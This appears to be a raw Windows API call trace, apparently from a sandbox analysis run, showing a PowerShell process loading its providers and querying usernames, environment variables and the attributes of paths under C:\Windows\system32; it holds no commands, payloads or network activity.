	[0446.256] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x12d360 | out: lpFileInformation=0x12d360*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0446.256] SetErrorMode (uMode=0x1) returned 0x1
	[0446.256] CoTaskMemAlloc (cb=0x804) returned 0x1b7d88c0
	[0446.256] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7d88c0, nSize=0x12d768 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12d768) returned 0x1
	[0446.257] CoTaskMemFree (pv=0x1b7d88c0) 
	[0446.257] CoTaskMemAlloc (cb=0x204) returned 0x334800
	[0446.257] GetUserNameW (in: lpBuffer=0x334800, pcbBuffer=0x12d7a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d7a8) returned 1
	[0446.257] CoTaskMemFree (pv=0x334800) 
	[0446.257] ReportEventW (hEventLog=0x1ba10008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3d11cc0*="FileSystem", lpRawData=0x3d11a50) returned 1
	[0446.258] CoTaskMemAlloc (cb=0x104) returned 0x2eaa90
	[0446.258] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eaa90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0446.258] CoTaskMemFree (pv=0x2eaa90) 
	[0446.258] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0446.259] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0446.259] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0446.259] CoTaskMemAlloc (cb=0x804) returned 0x1b7d88c0
	[0446.259] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7d88c0, nSize=0x12d768 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12d768) returned 0x1
	[0446.259] CoTaskMemFree (pv=0x1b7d88c0) 
	[0446.259] CoTaskMemAlloc (cb=0x204) returned 0x334800
	[0446.259] GetUserNameW (in: lpBuffer=0x334800, pcbBuffer=0x12d7a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d7a8) returned 1
	[0446.260] CoTaskMemFree (pv=0x334800) 
	[0446.260] ReportEventW (hEventLog=0x1ba10008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3d17500*="Function", lpRawData=0x3d17290) returned 1
	[0446.263] CoTaskMemAlloc (cb=0x104) returned 0x2eaa90
	[0446.263] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eaa90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0446.263] CoTaskMemFree (pv=0x2eaa90) 
	[0446.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0446.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0446.270] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0446.270] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0446.313] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0446.313] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0446.313] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0446.317] CoTaskMemAlloc (cb=0x804) returned 0x1b7d88c0
	[0446.317] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7d88c0, nSize=0x12d768 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12d768) returned 0x1
	[0446.318] CoTaskMemFree (pv=0x1b7d88c0) 
	[0446.318] CoTaskMemAlloc (cb=0x204) returned 0x334800
	[0446.318] GetUserNameW (in: lpBuffer=0x334800, pcbBuffer=0x12d7a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d7a8) returned 1
	[0446.318] CoTaskMemFree (pv=0x334800) 
	[0446.319] ReportEventW (hEventLog=0x1ba10008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3d39d28*="Registry", lpRawData=0x3d39ab8) returned 1
	[0446.326] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0446.326] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0446.326] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0446.326] CoTaskMemAlloc (cb=0x804) returned 0x1b7d88c0
	[0446.326] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7d88c0, nSize=0x12d768 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12d768) returned 0x1
	[0446.327] CoTaskMemFree (pv=0x1b7d88c0) 
	[0446.327] CoTaskMemAlloc (cb=0x204) returned 0x334800
	[0446.327] GetUserNameW (in: lpBuffer=0x334800, pcbBuffer=0x12d7a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d7a8) returned 1
	[0446.327] CoTaskMemFree (pv=0x334800) 
	[0446.327] ReportEventW (hEventLog=0x1ba10008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3d3f140*="Variable", lpRawData=0x3d3eed0) returned 1
	[0446.329] CoTaskMemAlloc (cb=0x104) returned 0x2eaa90
	[0446.329] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eaa90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0446.329] CoTaskMemFree (pv=0x2eaa90) 
	[0446.332] CoTaskMemAlloc (cb=0x104) returned 0x2eaa90
	[0446.332] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eaa90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0446.332] CoTaskMemFree (pv=0x2eaa90) 
	[0446.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x12d010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0446.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x12cf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0446.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x12cf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0446.335] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x12cf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0446.380] CoTaskMemAlloc (cb=0x804) returned 0x1b7d88c0
	[0446.380] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7d88c0, nSize=0x12d768 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12d768) returned 0x1
	[0446.380] CoTaskMemFree (pv=0x1b7d88c0) 
	[0446.380] CoTaskMemAlloc (cb=0x204) returned 0x334800
	[0446.380] GetUserNameW (in: lpBuffer=0x334800, pcbBuffer=0x12d7a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d7a8) returned 1
	[0446.381] CoTaskMemFree (pv=0x334800) 
	[0446.381] ReportEventW (hEventLog=0x1ba10008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3d52d58*="Certificate", lpRawData=0x3d52ae8) returned 1
	[0446.388] CoTaskMemAlloc (cb=0x104) returned 0x2eaa90
	[0446.388] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eaa90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0446.388] CoTaskMemFree (pv=0x2eaa90) 
	[0446.391] GetLogicalDrives () returned 0x4
	[0446.391] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x12d3f0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0446.391] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0446.392] CoTaskMemAlloc (cb=0x20e) returned 0x1b7c1df0
	[0446.392] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1b7c1df0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0446.392] CoTaskMemFree (pv=0x1b7c1df0) 
	[0446.393] CoTaskMemAlloc (cb=0x104) returned 0x2eaa90
	[0446.393] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eaa90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0446.393] CoTaskMemFree (pv=0x2eaa90) 
	[0446.393] CoTaskMemAlloc (cb=0x104) returned 0x2eaa90
	[0446.393] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eaa90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0446.393] CoTaskMemFree (pv=0x2eaa90) 
	[0446.409] CoTaskMemAlloc (cb=0x104) returned 0x2eaa90
	[0446.409] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eaa90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0446.409] CoTaskMemFree (pv=0x2eaa90) 
	[0446.410] CoTaskMemAlloc (cb=0x104) returned 0x2eaa90
	[0446.410] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eaa90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0446.410] CoTaskMemFree (pv=0x2eaa90) 
	[0446.411] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0446.411] SetErrorMode (uMode=0x1) returned 0x1
	[0446.411] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x12d3b0 | out: lpFileInformation=0x12d3b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0446.411] SetErrorMode (uMode=0x1) returned 0x1
	[0446.411] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0446.411] SetErrorMode (uMode=0x1) returned 0x1
	[0446.411] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x12d3b0 | out: lpFileInformation=0x12d3b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0446.412] SetErrorMode (uMode=0x1) returned 0x1
	[0446.412] CoTaskMemAlloc (cb=0x104) returned 0x2eaa90
	[0446.412] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eaa90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0446.412] CoTaskMemFree (pv=0x2eaa90) 
	[0446.416] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0446.417] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x12d370 | out: lpFileInformation=0x12d370*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0446.417] SetErrorMode (uMode=0x1) returned 0x1
	[0446.417] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12d160, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0446.417] SetErrorMode (uMode=0x1) returned 0x1
	[0446.417] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x12d370 | out: lpFileInformation=0x12d370*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0446.418] SetErrorMode (uMode=0x1) returned 0x1
	[0446.418] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12d170, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0446.418] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x12d060, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0446.418] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x12d160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0446.418] SetErrorMode (uMode=0x1) returned 0x1
	[0446.418] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x12d370 | out: lpFileInformation=0x12d370*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0446.418] SetErrorMode (uMode=0x1) returned 0x1
	[0446.418] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x12d160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0446.418] SetErrorMode (uMode=0x1) returned 0x1
	[0446.418] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x12d370 | out: lpFileInformation=0x12d370*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0446.418] SetErrorMode (uMode=0x1) returned 0x1
	[0446.419] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x12d170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0446.419] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x12d060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0446.419] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12d160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0446.419] SetErrorMode (uMode=0x1) returned 0x1
	[0446.419] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x12d370 | out: lpFileInformation=0x12d370*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0446.419] SetErrorMode (uMode=0x1) returned 0x1
	[0446.419] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12d160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0446.419] SetErrorMode (uMode=0x1) returned 0x1
	[0446.419] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x12d370 | out: lpFileInformation=0x12d370*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0446.420] SetErrorMode (uMode=0x1) returned 0x1
	[0446.420] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12d170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0446.420] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x12d060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0446.420] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x12d3b0 | out: lpFileInformation=0x12d3b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0446.420] SetErrorMode (uMode=0x1) returned 0x1
	[0446.420] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x12d1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0446.420] SetErrorMode (uMode=0x1) returned 0x1
	[0446.420] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x12d3b0 | out: lpFileInformation=0x12d3b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0446.421] SetErrorMode (uMode=0x1) returned 0x1
	[0446.421] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x12d1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0446.421] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x12d0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0446.421] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12d1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0446.421] SetErrorMode (uMode=0x1) returned 0x1
	[0446.421] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x12d3b0 | out: lpFileInformation=0x12d3b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0446.421] SetErrorMode (uMode=0x1) returned 0x1
	[0446.421] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12d1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0446.421] SetErrorMode (uMode=0x1) returned 0x1
	[0446.421] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x12d3b0 | out: lpFileInformation=0x12d3b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0446.421] SetErrorMode (uMode=0x1) returned 0x1
	[0446.421] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12d1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0446.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x12d0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0446.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12d410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
